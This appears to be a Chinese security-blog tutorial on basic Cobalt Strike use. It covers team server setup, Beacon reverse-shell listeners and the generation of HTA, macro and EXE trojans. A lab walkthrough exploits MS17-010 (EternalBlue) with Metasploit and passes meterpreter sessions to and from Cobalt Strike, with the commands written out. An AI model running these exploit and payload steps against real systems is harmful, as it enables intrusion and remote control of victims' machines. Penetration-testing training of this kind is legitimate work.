​Cobalt Strike基础使用

2025-08-04 09:16:16 RAIZ

文章作者:华盟安全团队-- Gaowu

Cobalt Strike分为客户端组件和服务器组件,服务器的组件也是团队服务器,可以放在局域网或者公网下进行团队使用,也是Cobalt Strike社会工程功能的托管机器,团队服务器还可以存储由Cobalt Strike收集的数据,并且进行日志管理。


Cobalt Strike服务器必须在Linux系统上运行,这里演示服务器在Linux KALI端,本地进行Cobalt Strike客户端的连接。


睿智创新RAIZ,一体化IT服务提供商


CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包。


CS使用

启动CS服务端


睿智创新RAIZ,一体化IT服务提供商
睿智创新RAIZ,一体化IT服务提供商


启动客户端

服务端启动后客户端启动进行连接(团队多人连接将用户名设置为自己的用来区分团队成员)


睿智创新RAIZ,一体化IT服务提供商


主界面


睿智创新RAIZ,一体化IT服务提供商


CS功能使用(主机上线)


1.设置监听器用来接收会话


睿智创新RAIZ,一体化IT服务提供商


name:监听器名字

payload:payload类型

Host: shell反弹的主机,kali IP

Port: 反弹端口


睿智创新RAIZ,一体化IT服务提供商


这里Payload有9种选项,如下:


内部的Listener

windows/beacon_dns/reverse_dns_txt

windows/beacon_dns/reverse_http

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https 

windows/beacon_smb/bind_pipe


外部的Listener

windows/foreign/reverse_dns_txt

windows/foreign/reverse_http

windows/foreign/reverse_https

windows/foreign/reverse_tcp


Beacon为内置的监听器,在目标主机执行相应的payload,获取shell到cs上;其中包含DNS、HTTP、HTTPS等,Beacon可以选择通过DNS还是HTTP/S协议出口网络,甚至可以在使用Beacon通讯过程中切换HTTP和DNS。其支持多主机连接,部署好Beacon后提交一个要连回的域名或主机的列表,Beacon将通过这些主机轮询。目标网络的防护团队必须拦截所有的列表中的主机才可中断和其网络的通讯。通过种种方式获取shell以后(比如直接运行生成的exe),就可以使用Beacon了。


Foreign为外部结合的Listener,经常用于MSF的结合,例如获取meterpreter到MSF上。



2.生成木马


HTML Application 生成恶意的HTA木马文件;
MS Office Macro 生成office宏病毒文件;
Payload Generator 生成各种语言版本的payload;
Windows Executable 生成可执行exe木马;
Windows Executable(S) 生成无状态的可执行exe木马


睿智创新RAIZ,一体化IT服务提供商


睿智创新RAIZ,一体化IT服务提供商


生成后会保存到指定地方,通过某种方式上传到对方机器上,可以通过Webshell方式等这里不在讲解了


受害者运行exe文件我们的CS就直接上线了


睿智创新RAIZ,一体化IT服务提供商


这是生成exe文件,还可以生成宏病毒等上面介绍到的。


3.正常我们进去需要调整响应的时间,sleep 3 就行。


睿智创新RAIZ,一体化IT服务提供商


睿智创新RAIZ,一体化IT服务提供商


可以对我们上线的机器进行以下操作,也可以联动MSF进行使用


睿智创新RAIZ,一体化IT服务提供商


联动MSF使用

将MSF的会话转发到CS上

通过漏洞复现演示MSF获取目标Session

KALI:192.168.50.218

CS:192.168.50.130

受害者IP:192.168.50.185


1.发现漏洞

Nmap -A扫描目标开放了445端口


睿智创新RAIZ,一体化IT服务提供商


通过使用MSF辅助模块扫描发现存在ms17_010漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.50.185

exploit


睿智创新RAIZ,一体化IT服务提供商


查找漏洞利用模块


睿智创新RAIZ,一体化IT服务提供商


漏洞利用

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set RHOST 192.168.50.185

Run


睿智创新RAIZ,一体化IT服务提供商


获取后 我们background获取session


睿智创新RAIZ,一体化IT服务提供商


与CS联动,将会话转发到CS中


CS配置新建一个监听


睿智创新RAIZ,一体化IT服务提供商


KALI中配置

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true

set lhost 192.168.50.218  //KALI IP

set lport 4443 与CS同端口

set session 1


睿智创新RAIZ,一体化IT服务提供商


CS这边就接收到了MSF的会话


睿智创新RAIZ,一体化IT服务提供商


CS的会话转发到MSF中


由于生成的木马就是HTTP的,所以委派给msf时,监听器还是HTTP的

CS添加一个监听器


睿智创新RAIZ,一体化IT服务提供商


MSF准备


Use exploit/multi/handler

Set payload windows/meterpreter/reverse_http

Set lhost ip

Set lport ip


睿智创新RAIZ,一体化IT服务提供商


设置完成后我们就可以使用CS进行委派会话了


睿智创新RAIZ,一体化IT服务提供商


选中我们刚刚创建的就行


睿智创新RAIZ,一体化IT服务提供商


这样我们的MSF端就会获取到这个会话



我要咨询